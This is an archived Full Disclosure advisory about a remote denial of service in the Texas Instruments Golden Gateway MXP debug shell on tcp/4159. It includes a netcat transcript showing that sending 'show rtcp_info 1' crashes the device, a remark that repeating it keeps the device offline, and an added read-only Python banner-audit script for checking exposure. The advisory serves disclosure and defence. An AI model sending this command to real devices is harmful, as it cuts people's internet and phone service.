Full Disclosure mailing list archives

DoS in TI Golden Gateway MXP Debug Application


From: will <will () shakingrock com>
Date: Thu, 29 Dec 2011 10:52:50 -0500

#######################################################################

                             Will Urbanski

Application:    Texas Instruments Golden Gateway MXP Debug Application
                http://www.ti.com

Vuln ID:        SHR20111201
                
Version:        2007

Platforms:      Embedded (tested on SMC D3GNV Cable Modem)

Bug:            input sanitization DoS vuln in `show rtcp_info`

Exploitation:   remote
Date:           01 Dec 2011
Author:         Will Urbanski
                e-mail: will () shakingrock com
                permalink:      http://www.shakingrock.com/vulns/SHR20111201.txt


#######################################################################


1) Introduction
2) `show rtcp_info`
3) Impact
4) Workaround


#######################################################################

===============
1) Introduction
===============

From vendor's homepage:
"Golden Gateway® software is designed to run on Texas Instruments (TI) Digital Signal Processors (DSPs). The software, 
which powers voice, fax and data modem transmission over the Internet, is inside products made by industry leaders such 
as Cisco Systems, 3Com, Nortel Networks and many other leading voice and data communications equipment manufacturers."

#######################################################################

==========================================
2) `show rtcp_info`
==========================================

Executing `show rtcp_info 1` results in system failure due to a critical process being terminated. The show command is 
normally used to display system information and should not result in application termination.

$ nc 172.16.1.1 4159
����!����Texas Instruments Inc. 2007
Golden Gateway Remote Command Processor
MXP>show version
show version
XGCP Version: 2.7.0
CM Version Label: 2.7.0
[...]
MXP>show rtcp_info 1
show rtcp_info 1
MXP>sigterm_prog=0;calling vp880_restart

The DoS can be initiated remotely by simply sending "show rtcp_info 1" to the MXP shell. During some of our tests we 
were unable to regain internet connectivity until the device had been unplugged. In the event that connectivity is 
restored, spamming "show rtcp_info 1" to the MXP shell will ensure the device stays offline.


#######################################################################

===========
3) Impact
===========

As mentioned on the vendor's site, the Golden Gateway Remote Command Processor MXP Debug Application is included in many 
embedded networking devices. "The software, which powers voice, fax and data modem transmission over the Internet, is 
inside products made by industry leaders such as Cisco Systems, 3Com, Nortel Networks and many other leading voice and 
data communications equipment manufacturers." This remote denial of service was discovered in an SMC D3GNV DOCSIS 3.0 
Multimedia Voice Gateway which provides voice, wifi, and cable internet capabilities. This vulnerability _may_ be found 
on any device that allows unauthenticated access to the MXP Debug Application shell.


#######################################################################

==============
4) Workaround
==============

Restrict access to port tcp/4159 on devices that are allowing unauthenticated access to the MXP Debug Application.
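
Whether the restriction is actually in place can be checked from the network side with a read-only audit. The script below is an added example, not part of the original advisory: it connects to tcp/4159, reads whatever the service volunteers, sends nothing, and classifies the result. The state names, AUTH_HINTS, and SAMPLE_BANNER are assumptions constructed for illustration.

```python
import socket
from typing import Optional

MXP_PORT = 4159  # port named in the advisory's workaround
BANNER_MARK = b"Golden Gateway Remote Command Processor"
PROMPT = b"MXP>"
# Assumption: a shell that authenticates asks for credentials before any prompt.
AUTH_HINTS = (b"login:", b"username:", b"password:")

# Constructed sample modelled on the advisory's transcript; the leading bytes
# are placeholders for the unprintable bytes that precede the banner.
SAMPLE_BANNER = (b"\xff\xfb\x01\xff\xfb\x03Texas Instruments Inc. 2007\r\n"
                 b"Golden Gateway Remote Command Processor\r\nMXP>")

def classify_banner(data: bytes) -> str:
    """Classify what a service on tcp/4159 volunteered on connect."""
    if not data:
        return "open-no-banner"
    if BANNER_MARK not in data and PROMPT not in data:
        return "other-service"
    if any(hint in data.lower() for hint in AUTH_HINTS):
        return "mxp-auth-required"
    return "mxp-unauthenticated" if PROMPT in data else "mxp-banner-only"

def read_banner(host: str, port: int = MXP_PORT, timeout: float = 3.0) -> Optional[bytes]:
    """Connect and read only; nothing is ever sent. None means not reachable."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            data = b""
            try:
                while PROMPT not in data and len(data) < 4096:
                    chunk = sock.recv(1024)
                    if not chunk:
                        break
                    data += chunk
            except socket.timeout:
                pass  # service went quiet; classify what arrived
            return data
    except OSError:
        return None

def audit(hosts, reader=read_banner):
    """Map each host to its exposure state; reader is injectable for offline runs."""
    states = {}
    for host in hosts:
        data = reader(host)
        states[host] = "filtered-or-closed" if data is None else classify_banner(data)
    return states
```

Run `audit([...])` against your own device inventory from each network segment that should be blocked; any host reported as "mxp-unauthenticated" still needs the tcp/4159 restriction.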
